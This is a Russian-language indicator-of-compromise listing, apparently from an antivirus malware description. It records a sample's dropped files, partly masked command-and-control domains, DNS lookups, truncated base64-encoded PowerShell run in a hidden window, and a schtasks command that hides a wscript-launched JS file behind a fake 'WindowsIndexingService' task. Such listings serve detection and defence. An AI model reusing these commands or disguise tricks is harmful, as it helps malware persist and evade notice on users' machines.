Техническая информация
- <SYSTEM32>\tasks\windowsindexingservice
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsindexingservice.lnk
- C:\users\public\libraries\thumbcache_33.db
- %TEMP%\xafx909.1.tmp
- C:\users\public\libraries\thumbcache_33.db
- 'ad#.##nebrack.com':80
- http://ad#.##nebrack.com/
- DNS ASK ad#.##nebrack.com
- DNS ASK zg####iwnji0.top
- DNS ASK ot####iwnji0.top
- DNS ASK mj####iwnji0.top
- DNS ASK og####iwnji0.top
- DNS ASK z2####iwnji0.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...
- '<SYSTEM32>\schtasks.exe' /delete /TN WindowsIndexingService /f
- '<SYSTEM32>\schtasks.exe' /delete /TN "Windows Indexing Service" /f
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsIndexingService /sc DAILY /st 00:00 /f /RI 13 /du 23:59 /TR "wscript.exe //nologo "C:\Users\Public\Libraries\WindowsIndexingService.js" >NUL 2>&1"